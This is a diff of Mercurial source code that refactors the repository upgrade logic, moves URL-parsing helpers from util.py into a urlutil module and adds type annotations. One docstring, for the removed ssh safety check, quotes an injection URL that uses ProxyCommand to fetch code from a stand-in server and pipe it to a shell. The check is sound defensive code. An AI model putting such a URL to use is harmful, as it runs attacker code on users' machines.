+ tr, srcrepo, unfi.manifestlog._rootstore._revlog
+ )
+ scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements)
+ else:
+ with dstrepo.transaction(b'upgrade') as tr:
+ _clonerevlogs(
+ ui,
+ srcrepo,
+ dstrepo,
+ tr,
+ upgrade_op,
+ )
+
+ # Now copy other files in the store directory.
+ for p in _files_to_copy_post_revlog_clone(srcrepo):
+ srcrepo.ui.status(_(b'copying %s\n') % p)
+ src = srcrepo.store.rawvfs.join(p)
+ dst = dstrepo.store.rawvfs.join(p)
+ util.copyfile(src, dst, copystat=True)
+
+ finishdatamigration(ui, srcrepo, dstrepo, requirements)
+
+ ui.status(_(b'data fully upgraded in a temporary repository\n'))
+
+ if upgrade_op.backup_store:
+ backuppath = pycompat.mkdtemp(
+ prefix=b'upgradebackup.', dir=srcrepo.path
+ )
+ backupvfs = vfsmod.vfs(backuppath)
+
+ # Make a backup of requires file first, as it is the first to be modified.
+ util.copyfile(
+ srcrepo.vfs.join(b'requires'), backupvfs.join(b'requires')
+ )
+
+ # We install an arbitrary requirement that clients must not support
+ # as a mechanism to lock out new clients during the data swap. This is
+ # better than allowing a client to continue while the repository is in
+ # an inconsistent state.
+ ui.status(
+ _(
+ b'marking source repository as being upgraded; clients will be '
+ b'unable to read from repository\n'
+ )
+ )
+ scmutil.writereporequirements(
+ srcrepo, srcrepo.requirements | {b'upgradeinprogress'}
)
- # Now copy other files in the store directory.
- for p in _files_to_copy_post_revlog_clone(srcrepo):
- srcrepo.ui.status(_(b'copying %s\n') % p)
- src = srcrepo.store.rawvfs.join(p)
- dst = dstrepo.store.rawvfs.join(p)
- util.copyfile(src, dst, copystat=True)
-
- finishdatamigration(ui, srcrepo, dstrepo, requirements)
-
- ui.status(_(b'data fully upgraded in a temporary repository\n'))
-
- backuppath = pycompat.mkdtemp(prefix=b'upgradebackup.', dir=srcrepo.path)
- backupvfs = vfsmod.vfs(backuppath)
-
- # Make a backup of requires file first, as it is the first to be modified.
- util.copyfile(srcrepo.vfs.join(b'requires'), backupvfs.join(b'requires'))
-
- # We install an arbitrary requirement that clients must not support
- # as a mechanism to lock out new clients during the data swap. This is
- # better than allowing a client to continue while the repository is in
- # an inconsistent state.
- ui.status(
- _(
- b'marking source repository as being upgraded; clients will be '
- b'unable to read from repository\n'
- )
- )
- scmutil.writereporequirements(
- srcrepo, srcrepo.requirements | {b'upgradeinprogress'}
- )
+ ui.status(_(b'starting in-place swap of repository data\n'))
+ if upgrade_op.backup_store:
+ ui.status(
+ _(b'replaced files will be backed up at %s\n') % backuppath
+ )
- ui.status(_(b'starting in-place swap of repository data\n'))
- ui.status(_(b'replaced files will be backed up at %s\n') % backuppath)
-
- # Now swap in the new store directory. Doing it as a rename should make
- # the operation nearly instantaneous and atomic (at least in well-behaved
- # environments).
- ui.status(_(b'replacing store...\n'))
- tstart = util.timer()
- _replacestores(srcrepo, dstrepo, backupvfs, upgrade_op)
- elapsed = util.timer() - tstart
- ui.status(
- _(
- b'store replacement complete; repository was inconsistent for '
- b'%0.1fs\n'
+ # Now swap in the new store directory. Doing it as a rename should make
+ # the operation nearly instantaneous and atomic (at least in well-behaved
+ # environments).
+ ui.status(_(b'replacing store...\n'))
+ tstart = util.timer()
+ _replacestores(srcrepo, dstrepo, backupvfs, upgrade_op)
+ elapsed = util.timer() - tstart
+ ui.status(
+ _(
+ b'store replacement complete; repository was inconsistent for '
+ b'%0.1fs\n'
+ )
+ % elapsed
)
- % elapsed
- )
- # We first write the requirements file. Any new requirements will lock
- # out legacy clients.
- ui.status(
- _(
- b'finalizing requirements file and making repository readable '
- b'again\n'
+ # We first write the requirements file. Any new requirements will lock
+ # out legacy clients.
+ ui.status(
+ _(
+ b'finalizing requirements file and making repository readable '
+ b'again\n'
+ )
)
- )
- scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements)
+ scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements)
- # The lock file from the old store won't be removed because nothing has a
- # reference to its new location. So clean it up manually. Alternatively, we
- # could update srcrepo.svfs and other variables to point to the new
- # location. This is simpler.
- assert backupvfs is not None # help pytype
- backupvfs.unlink(b'store/lock')
+ if upgrade_op.backup_store:
+ # The lock file from the old store won't be removed because nothing has a
+ # reference to its new location. So clean it up manually. Alternatively, we
+ # could update srcrepo.svfs and other variables to point to the new
+ # location. This is simpler.
+ assert backupvfs is not None # help pytype
+ backupvfs.unlink(b'store/lock')
return backuppath
--- a/mercurial/url.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/url.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# url.py - HTTP handling for mercurial
#
-# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com>
# Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
@@ -26,7 +26,10 @@
urllibcompat,
util,
)
-from .utils import stringutil
+from .utils import (
+ stringutil,
+ urlutil,
+)
httplib = util.httplib
stringio = util.stringio
@@ -75,17 +78,17 @@
user, passwd = auth.get(b'username'), auth.get(b'password')
self.ui.debug(b"using auth.%s.* for authentication\n" % group)
if not user or not passwd:
- u = util.url(pycompat.bytesurl(authuri))
+ u = urlutil.url(pycompat.bytesurl(authuri))
u.query = None
if not self.ui.interactive():
raise error.Abort(
_(b'http authorization required for %s')
- % util.hidepassword(bytes(u))
+ % urlutil.hidepassword(bytes(u))
)
self.ui.write(
_(b"http authorization required for %s\n")
- % util.hidepassword(bytes(u))
+ % urlutil.hidepassword(bytes(u))
)
self.ui.write(_(b"realm: %s\n") % pycompat.bytesurl(realm))
if user:
@@ -128,7 +131,7 @@
proxyurl.startswith(b'http:') or proxyurl.startswith(b'https:')
):
proxyurl = b'http://' + proxyurl + b'/'
- proxy = util.url(proxyurl)
+ proxy = urlutil.url(proxyurl)
if not proxy.user:
proxy.user = ui.config(b"http_proxy", b"user")
proxy.passwd = ui.config(b"http_proxy", b"passwd")
@@ -155,7 +158,9 @@
# expects them to be.
proxyurl = str(proxy)
proxies = {'http': proxyurl, 'https': proxyurl}
- ui.debug(b'proxying through %s\n' % util.hidepassword(bytes(proxy)))
+ ui.debug(
+ b'proxying through %s\n' % urlutil.hidepassword(bytes(proxy))
+ )
else:
proxies = {}
@@ -219,7 +224,7 @@
new_tunnel = False
if new_tunnel or tunnel_host == urllibcompat.getfullurl(req): # has proxy
- u = util.url(pycompat.bytesurl(tunnel_host))
+ u = urlutil.url(pycompat.bytesurl(tunnel_host))
if new_tunnel or u.scheme == b'https': # only use CONNECT for HTTPS
h.realhostport = b':'.join([u.host, (u.port or b'443')])
h.headers = req.headers.copy()
@@ -675,7 +680,7 @@
def open(ui, url_, data=None, sendaccept=True):
- u = util.url(url_)
+ u = urlutil.url(url_)
if u.scheme:
u.scheme = u.scheme.lower()
url_, authinfo = u.authinfo()
--- a/mercurial/util.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/util.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
@@ -28,7 +28,6 @@
import platform as pyplatform
import re as remod
import shutil
-import socket
import stat
import sys
import time
@@ -57,8 +56,18 @@
hashutil,
procutil,
stringutil,
+ urlutil,
)
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ Iterator,
+ List,
+ Optional,
+ Tuple,
+ )
+
+
base85 = policy.importmod('base85')
osutil = policy.importmod('osutil')
@@ -133,6 +142,7 @@
def setumask(val):
+ # type: (int) -> None
''' updates the umask. used by chg server '''
if pycompat.iswindows:
return
@@ -307,7 +317,7 @@
try:
- buffer = buffer
+ buffer = buffer # pytype: disable=name-error
except NameError:
def buffer(sliceable, offset=0, length=None):
@@ -1254,7 +1264,8 @@
"""call this before writes, return self or a copied new object"""
if getattr(self, '_copied', 0):
self._copied -= 1
- return self.__class__(self)
+ # Function cow.__init__ expects 1 arg(s), got 2 [wrong-arg-count]
+ return self.__class__(self) # pytype: disable=wrong-arg-count
return self
def copy(self):
@@ -1285,11 +1296,13 @@
if pycompat.ispypy:
# __setitem__() isn't called as of PyPy 5.8.0
- def update(self, src):
+ def update(self, src, **f):
if isinstance(src, dict):
src = pycompat.iteritems(src)
for k, v in src:
self[k] = v
+ for k in f:
+ self[k] = f[k]
def insert(self, position, key, value):
for (i, (k, v)) in enumerate(list(self.items())):
@@ -1395,8 +1408,8 @@
__slots__ = ('next', 'prev', 'key', 'value', 'cost')
def __init__(self):
- self.next = None
- self.prev = None
+ self.next = self
+ self.prev = self
self.key = _notset
self.value = None
@@ -1435,9 +1448,7 @@
def __init__(self, max, maxcost=0):
self._cache = {}
- self._head = head = _lrucachenode()
- head.prev = head
- head.next = head
+ self._head = _lrucachenode()
self._size = 1
self.capacity = max
self.totalcost = 0
@@ -1542,6 +1553,7 @@
"""
try:
node = self._cache[k]
+ assert node is not None # help pytype
return node.value
except KeyError:
if default is _notset:
@@ -1599,6 +1611,9 @@
# Walk the linked list backwards starting at tail node until we hit
# a non-empty node.
n = self._head.prev
+
+ assert n is not None # help pytype
+
while n.key is _notset:
n = n.prev
@@ -1833,6 +1848,7 @@
def pathto(root, n1, n2):
+ # type: (bytes, bytes, bytes) -> bytes
"""return the relative path from one place to another.
root should use os.sep to separate directories
n1 should use os.sep to separate directories
@@ -2017,6 +2033,7 @@
def checkwinfilename(path):
+ # type: (bytes) -> Optional[bytes]
r"""Check that the base-relative path is a valid filename on Windows.
Returns None if the path is ok, or a UI string describing the problem.
@@ -2111,6 +2128,7 @@
def readlock(pathname):
+ # type: (bytes) -> bytes
try:
return readlink(pathname)
except OSError as why:
@@ -2134,6 +2152,7 @@
def fscasesensitive(path):
+ # type: (bytes) -> bool
"""
Return true if the given path is on a case-sensitive filesystem
@@ -2170,10 +2189,11 @@
def _checkre2(self):
global _re2
global _re2_input
+
+ check_pattern = br'\[([^\[]+)\]'
+ check_input = b'[ui]'
try:
# check if match works, see issue3964
- check_pattern = br'\[([^\[]+)\]'
- check_input = b'[ui]'
_re2 = bool(re2.match(check_pattern, check_input))
except ImportError:
_re2 = False
@@ -2226,6 +2246,7 @@
def fspath(name, root):
+ # type: (bytes, bytes) -> bytes
"""Get name in the case stored in the filesystem
The name should be relative to root, and be normcase-ed for efficiency.
@@ -2270,6 +2291,7 @@
def checknlink(testfile):
+ # type: (bytes) -> bool
'''check whether hardlink count reporting works properly'''
# testfile may be open, so we need a separate file for checking to
@@ -2303,8 +2325,9 @@
def endswithsep(path):
+ # type: (bytes) -> bool
'''Check path ends with os.sep or os.altsep.'''
- return (
+ return bool( # help pytype
path.endswith(pycompat.ossep)
or pycompat.osaltsep
and path.endswith(pycompat.osaltsep)
@@ -2312,6 +2335,7 @@
def splitpath(path):
+ # type: (bytes) -> List[bytes]
"""Split path by os.sep.
Note that this function does not use os.altsep because this is
an alternative of simple "xxx.split(os.sep)".
@@ -2540,6 +2564,7 @@
def unlinkpath(f, ignoremissing=False, rmdir=True):
+ # type: (bytes, bool, bool) -> None
"""unlink and remove the directory if it is empty"""
if ignoremissing:
tryunlink(f)
@@ -2554,6 +2579,7 @@
def tryunlink(f):
+ # type: (bytes) -> None
"""Attempt to remove a file, ignoring ENOENT errors."""
try:
unlink(f)
@@ -2563,6 +2589,7 @@
def makedirs(name, mode=None, notindexed=False):
+ # type: (bytes, Optional[int], bool) -> None
"""recursive directory creation with parent mode inheritance
Newly created directories are marked as "not to be indexed by
@@ -2592,16 +2619,19 @@
def readfile(path):
+ # type: (bytes) -> bytes
with open(path, b'rb') as fp:
return fp.read()
def writefile(path, text):
+ # type: (bytes, bytes) -> None
with open(path, b'wb') as fp:
fp.write(text)
def appendfile(path, text):
+ # type: (bytes, bytes) -> None
with open(path, b'ab') as fp:
fp.write(text)
@@ -2763,6 +2793,7 @@
def processlinerange(fromline, toline):
+ # type: (int, int) -> Tuple[int, int]
"""Check that linerange <fromline>:<toline> makes sense and return a
0-based range.
@@ -2822,10 +2853,12 @@
def tolf(s):
+ # type: (bytes) -> bytes
return _eolre.sub(b'\n', s)
def tocrlf(s):
+ # type: (bytes) -> bytes
return _eolre.sub(b'\r\n', s)
@@ -2889,12 +2922,14 @@
def iterlines(iterator):
+ # type: (Iterator[bytes]) -> Iterator[bytes]
for chunk in iterator:
for line in chunk.splitlines():
yield line
def expandpath(path):
+ # type: (bytes) -> bytes
return os.path.expanduser(os.path.expandvars(path))
@@ -2924,396 +2959,52 @@
return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
-def getport(port):
- """Return the port for a given network service.
-
- If port is an integer, it's returned as is. If it's a string, it's
- looked up using socket.getservbyname(). If there's no matching
- service, error.Abort is raised.
- """
- try:
- return int(port)
- except ValueError:
- pass
-
- try:
- return socket.getservbyname(pycompat.sysstr(port))
- except socket.error:
- raise error.Abort(
- _(b"no port number associated with service '%s'") % port
- )
-
-
-class url(object):
- r"""Reliable URL parser.
-
- This parses URLs and provides attributes for the following
- components:
-
- <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
-
- Missing components are set to None. The only exception is
- fragment, which is set to '' if present but empty.
-
- If parsefragment is False, fragment is included in query. If
- parsequery is False, query is included in path. If both are
- False, both fragment and query are included in path.
-
- See http://www.ietf.org/rfc/rfc2396.txt for more information.
-
- Note that for backward compatibility reasons, bundle URLs do not
- take host names. That means 'bundle://../' has a path of '../'.
-
- Examples:
-
- >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
- <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
- >>> url(b'ssh://[::1]:2200//home/joe/repo')
- <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
- >>> url(b'file:///home/joe/repo')
- <url scheme: 'file', path: '/home/joe/repo'>
- >>> url(b'file:///c:/temp/foo/')
- <url scheme: 'file', path: 'c:/temp/foo/'>
- >>> url(b'bundle:foo')
- <url scheme: 'bundle', path: 'foo'>
- >>> url(b'bundle://../foo')
- <url scheme: 'bundle', path: '../foo'>
- >>> url(br'c:\foo\bar')
- <url path: 'c:\\foo\\bar'>
- >>> url(br'\\blah\blah\blah')
- <url path: '\\\\blah\\blah\\blah'>
- >>> url(br'\\blah\blah\blah#baz')
- <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
- >>> url(br'file:///C:\users\me')
- <url scheme: 'file', path: 'C:\\users\\me'>
-
- Authentication credentials:
-
- >>> url(b'ssh://joe:xyz@x/repo')
- <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
- >>> url(b'ssh://joe@x/repo')
- <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
-
- Query strings and fragments:
-
- >>> url(b'http://host/a?b#c')
- <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
- >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
- <url scheme: 'http', host: 'host', path: 'a?b#c'>
-
- Empty path:
-
- >>> url(b'')
- <url path: ''>
- >>> url(b'#a')
- <url path: '', fragment: 'a'>
- >>> url(b'http://host/')
- <url scheme: 'http', host: 'host', path: ''>
- >>> url(b'http://host/#a')
- <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
-
- Only scheme:
-
- >>> url(b'http:')
- <url scheme: 'http'>
- """
-
- _safechars = b"!~*'()+"
- _safepchars = b"/!~*'()+:\\"
- _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
-
- def __init__(self, path, parsequery=True, parsefragment=True):
- # We slowly chomp away at path until we have only the path left
- self.scheme = self.user = self.passwd = self.host = None
- self.port = self.path = self.query = self.fragment = None
- self._localpath = True
- self._hostport = b''
- self._origpath = path
-
- if parsefragment and b'#' in path:
- path, self.fragment = path.split(b'#', 1)
-
- # special case for Windows drive letters and UNC paths
- if hasdriveletter(path) or path.startswith(b'\\\\'):
- self.path = path
- return
-
- # For compatibility reasons, we can't handle bundle paths as
- # normal URLS
- if path.startswith(b'bundle:'):
- self.scheme = b'bundle'
- path = path[7:]
- if path.startswith(b'//'):
- path = path[2:]
- self.path = path
- return
-
- if self._matchscheme(path):
- parts = path.split(b':', 1)
- if parts[0]:
- self.scheme, path = parts
- self._localpath = False
-
- if not path:
- path = None
- if self._localpath:
- self.path = b''
- return
- else:
- if self._localpath:
- self.path = path
- return
-
- if parsequery and b'?' in path:
- path, self.query = path.split(b'?', 1)
- if not path:
- path = None
- if not self.query:
- self.query = None
-
- # // is required to specify a host/authority
- if path and path.startswith(b'//'):
- parts = path[2:].split(b'/', 1)
- if len(parts) > 1:
- self.host, path = parts
- else:
- self.host = parts[0]
- path = None
- if not self.host:
- self.host = None
- # path of file:///d is /d
- # path of file:///d:/ is d:/, not /d:/
- if path and not hasdriveletter(path):
- path = b'/' + path
-
- if self.host and b'@' in self.host:
- self.user, self.host = self.host.rsplit(b'@', 1)
- if b':' in self.user:
- self.user, self.passwd = self.user.split(b':', 1)
- if not self.host:
- self.host = None
-
- # Don't split on colons in IPv6 addresses without ports
- if (
- self.host
- and b':' in self.host
- and not (
- self.host.startswith(b'[') and self.host.endswith(b']')
- )
- ):
- self._hostport = self.host
- self.host, self.port = self.host.rsplit(b':', 1)
- if not self.host:
- self.host = None
-
- if (
- self.host
- and self.scheme == b'file'
- and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
- ):
- raise error.Abort(
- _(b'file:// URLs can only refer to localhost')
- )
-
- self.path = path
-
- # leave the query string escaped
- for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
- v = getattr(self, a)
- if v is not None:
- setattr(self, a, urlreq.unquote(v))
-
- @encoding.strmethod
- def __repr__(self):
- attrs = []
- for a in (
- b'scheme',
- b'user',
- b'passwd',
- b'host',
- b'port',
- b'path',
- b'query',
- b'fragment',
- ):
- v = getattr(self, a)
- if v is not None:
- attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
- return b'<url %s>' % b', '.join(attrs)
-
- def __bytes__(self):
- r"""Join the URL's components back into a URL string.
-
- Examples:
-
- >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
- 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
- >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
- 'http://user:pw@host:80/?foo=bar&baz=42'
- >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
- 'http://user:pw@host:80/?foo=bar%3dbaz'
- >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
- 'ssh://user:pw@[::1]:2200//home/joe#'
- >>> bytes(url(b'http://localhost:80//'))
- 'http://localhost:80//'
- >>> bytes(url(b'http://localhost:80/'))
- 'http://localhost:80/'
- >>> bytes(url(b'http://localhost:80'))
- 'http://localhost:80/'
- >>> bytes(url(b'bundle:foo'))
- 'bundle:foo'
- >>> bytes(url(b'bundle://../foo'))
- 'bundle:../foo'
- >>> bytes(url(b'path'))
- 'path'
- >>> bytes(url(b'file:///tmp/foo/bar'))
- 'file:///tmp/foo/bar'
- >>> bytes(url(b'file:///c:/tmp/foo/bar'))
- 'file:///c:/tmp/foo/bar'
- >>> print(url(br'bundle:foo\bar'))
- bundle:foo\bar
- >>> print(url(br'file:///D:\data\hg'))
- file:///D:\data\hg
- """
- if self._localpath:
- s = self.path
- if self.scheme == b'bundle':
- s = b'bundle:' + s
- if self.fragment:
- s += b'#' + self.fragment
- return s
-
- s = self.scheme + b':'
- if self.user or self.passwd or self.host:
- s += b'//'
- elif self.scheme and (
- not self.path
- or self.path.startswith(b'/')
- or hasdriveletter(self.path)
- ):
- s += b'//'
- if hasdriveletter(self.path):
- s += b'/'
- if self.user:
- s += urlreq.quote(self.user, safe=self._safechars)
- if self.passwd:
- s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
- if self.user or self.passwd:
- s += b'@'
- if self.host:
- if not (self.host.startswith(b'[') and self.host.endswith(b']')):
- s += urlreq.quote(self.host)
- else:
- s += self.host
- if self.port:
- s += b':' + urlreq.quote(self.port)
- if self.host:
- s += b'/'
- if self.path:
- # TODO: similar to the query string, we should not unescape the
- # path when we store it, the path might contain '%2f' = '/',
- # which we should *not* escape.
- s += urlreq.quote(self.path, safe=self._safepchars)
- if self.query:
- # we store the query in escaped form.
- s += b'?' + self.query
- if self.fragment is not None:
- s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
- return s
-
- __str__ = encoding.strmethod(__bytes__)
-
- def authinfo(self):
- user, passwd = self.user, self.passwd
- try:
- self.user, self.passwd = None, None
- s = bytes(self)
- finally:
- self.user, self.passwd = user, passwd
- if not self.user:
- return (s, None)
- # authinfo[1] is passed to urllib2 password manager, and its
- # URIs must not contain credentials. The host is passed in the
- # URIs list because Python < 2.4.3 uses only that to search for
- # a password.
- return (s, (None, (s, self.host), self.user, self.passwd or b''))
-
- def isabs(self):
- if self.scheme and self.scheme != b'file':
- return True # remote URL
- if hasdriveletter(self.path):
- return True # absolute for our purposes - can't be joined()
- if self.path.startswith(br'\\'):
- return True # Windows UNC path
- if self.path.startswith(b'/'):
- return True # POSIX-style
- return False
-
- def localpath(self):
- if self.scheme == b'file' or self.scheme == b'bundle':
- path = self.path or b'/'
- # For Windows, we need to promote hosts containing drive
- # letters to paths with drive letters.
- if hasdriveletter(self._hostport):
- path = self._hostport + b'/' + self.path
- elif (
- self.host is not None and self.path and not hasdriveletter(path)
- ):
- path = b'/' + path
- return path
- return self._origpath
-
- def islocal(self):
- '''whether localpath will return something that posixfile can open'''
- return (
- not self.scheme
- or self.scheme == b'file'
- or self.scheme == b'bundle'
- )
-
-
-def hasscheme(path):
- return bool(url(path).scheme)
-
-
-def hasdriveletter(path):
- return path and path[1:2] == b':' and path[0:1].isalpha()
-
-
-def urllocalpath(path):
- return url(path, parsequery=False, parsefragment=False).localpath()
-
-
-def checksafessh(path):
- """check if a path / url is a potentially unsafe ssh exploit (SEC)
-
- This is a sanity check for ssh urls. ssh will parse the first item as
- an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
- Let's prevent these potentially exploited urls entirely and warn the
- user.
-
- Raises an error.Abort when the url is unsafe.
- """
- path = urlreq.unquote(path)
- if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
- raise error.Abort(
- _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
- )
-
-
-def hidepassword(u):
- '''hide user credential in a url string'''
- u = url(u)
- if u.passwd:
- u.passwd = b'***'
- return bytes(u)
-
-
-def removeauth(u):
- '''remove all authentication information from a url string'''
- u = url(u)
- u.user = u.passwd = None
- return bytes(u)
+def getport(*args, **kwargs):
+ msg = b'getport(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.getport(*args, **kwargs)
+
+
+def url(*args, **kwargs):
+ msg = b'url(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.url(*args, **kwargs)
+
+
+def hasscheme(*args, **kwargs):
+ msg = b'hasscheme(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.hasscheme(*args, **kwargs)
+
+
+def hasdriveletter(*args, **kwargs):
+ msg = b'hasdriveletter(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.hasdriveletter(*args, **kwargs)
+
+
+def urllocalpath(*args, **kwargs):
+ msg = b'urllocalpath(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.urllocalpath(*args, **kwargs)
+
+
+def checksafessh(*args, **kwargs):
+ msg = b'checksafessh(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.checksafessh(*args, **kwargs)
+
+
+def hidepassword(*args, **kwargs):
+ msg = b'hidepassword(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.hidepassword(*args, **kwargs)
+
+
+def removeauth(*args, **kwargs):
+ msg = b'removeauth(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.removeauth(*args, **kwargs)
timecount = unitcountfn(
@@ -3415,6 +3106,7 @@
def sizetoint(s):
+ # type: (bytes) -> int
"""Convert a space specifier to a byte count.
>>> sizetoint(b'30')
@@ -3640,6 +3332,7 @@
def _estimatememory():
+ # type: () -> Optional[int]
"""Provide an estimate for the available system memory in Bytes.
If no estimate can be provided on the platform, returns None.
@@ -3647,7 +3340,12 @@
if pycompat.sysplatform.startswith(b'win'):
# On Windows, use the GlobalMemoryStatusEx kernel function directly.
from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
- from ctypes.wintypes import Structure, byref, sizeof, windll
+ from ctypes.wintypes import ( # pytype: disable=import-error
+ Structure,
+ byref,
+ sizeof,
+ windll,
+ )
class MEMORYSTATUSEX(Structure):
_fields_ = [
--- a/mercurial/utils/compression.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/utils/compression.py Tue Apr 20 11:01:06 2021 -0400
@@ -685,9 +685,11 @@
# while providing no worse compression. It strikes a good balance
# between speed and compression.
level = opts.get(b'level', 3)
+ # default to single-threaded compression
+ threads = opts.get(b'threads', 0)
zstd = self._module
- z = zstd.ZstdCompressor(level=level).compressobj()
+ z = zstd.ZstdCompressor(level=level, threads=threads).compressobj()
for chunk in it:
data = z.compress(chunk)
if data:
--- a/mercurial/utils/dateutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/utils/dateutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -18,6 +18,18 @@
pycompat,
)
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ Callable,
+ Dict,
+ Iterable,
+ Optional,
+ Tuple,
+ Union,
+ )
+
+ hgdate = Tuple[float, int] # (unixtime, offset)
+
# used by parsedate
defaultdateformats = (
b'%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
@@ -62,13 +74,16 @@
def makedate(timestamp=None):
+ # type: (Optional[float]) -> hgdate
"""Return a unix timestamp (or the current time) as a (unixtime,
offset) tuple based off the local timezone."""
if timestamp is None:
timestamp = time.time()
if timestamp < 0:
hint = _(b"check your clock")
- raise error.Abort(_(b"negative timestamp: %d") % timestamp, hint=hint)
+ raise error.InputError(
+ _(b"negative timestamp: %d") % timestamp, hint=hint
+ )
delta = datetime.datetime.utcfromtimestamp(
timestamp
) - datetime.datetime.fromtimestamp(timestamp)
@@ -77,6 +92,7 @@
def datestr(date=None, format=b'%a %b %d %H:%M:%S %Y %1%2'):
+ # type: (Optional[hgdate], bytes) -> bytes
"""represent a (unixtime, offset) tuple as a localized time.
unixtime is seconds since the epoch, and offset is the time zone's
number of seconds away from UTC.
@@ -114,11 +130,13 @@
def shortdate(date=None):
+ # type: (Optional[hgdate]) -> bytes
"""turn (timestamp, tzoff) tuple into iso 8631 date."""
return datestr(date, format=b'%Y-%m-%d')
def parsetimezone(s):
+ # type: (bytes) -> Tuple[Optional[int], bytes]
"""find a trailing timezone, if any, in string, and return a
(offset, remainder) pair"""
s = pycompat.bytestr(s)
@@ -154,6 +172,7 @@
def strdate(string, format, defaults=None):
+ # type: (bytes, bytes, Optional[Dict[bytes, Tuple[bytes, bytes]]]) -> hgdate
"""parse a localized time string and return a (unixtime, offset) tuple.
if the string cannot be parsed, ValueError is raised."""
if defaults is None:
@@ -196,6 +215,7 @@
def parsedate(date, formats=None, bias=None):
+ # type: (Union[bytes, hgdate], Optional[Iterable[bytes]], Optional[Dict[bytes, bytes]]) -> hgdate
"""parse a localized date/time and return a (unixtime, offset) tuple.
The date may be a "unixtime offset" string or in one of the specified
@@ -221,8 +241,11 @@
bias = {}
if not date:
return 0, 0
- if isinstance(date, tuple) and len(date) == 2:
- return date
+ if isinstance(date, tuple):
+ if len(date) == 2:
+ return date
+ else:
+ raise error.ProgrammingError(b"invalid date format")
if not formats:
formats = defaultdateformats
date = date.strip()
@@ -282,6 +305,7 @@
def matchdate(date):
+ # type: (bytes) -> Callable[[float], bool]
"""Return a function that matches a given date match specifier
Formats include:
@@ -311,10 +335,12 @@
"""
def lower(date):
+ # type: (bytes) -> float
d = {b'mb': b"1", b'd': b"1"}
return parsedate(date, extendeddateformats, d)[0]
def upper(date):
+ # type: (bytes) -> float
d = {b'mb': b"12", b'HI': b"23", b'M': b"59", b'S': b"59"}
for days in (b"31", b"30", b"29"):
try:
@@ -328,24 +354,26 @@
date = date.strip()
if not date:
- raise error.Abort(_(b"dates cannot consist entirely of whitespace"))
+ raise error.InputError(
+ _(b"dates cannot consist entirely of whitespace")
+ )
elif date[0:1] == b"<":
if not date[1:]:
- raise error.Abort(_(b"invalid day spec, use '<DATE'"))
+ raise error.InputError(_(b"invalid day spec, use '<DATE'"))
when = upper(date[1:])
return lambda x: x <= when
elif date[0:1] == b">":
if not date[1:]:
- raise error.Abort(_(b"invalid day spec, use '>DATE'"))
+ raise error.InputError(_(b"invalid day spec, use '>DATE'"))
when = lower(date[1:])
return lambda x: x >= when
elif date[0:1] == b"-":
try:
days = int(date[1:])
except ValueError:
- raise error.Abort(_(b"invalid day spec: %s") % date[1:])
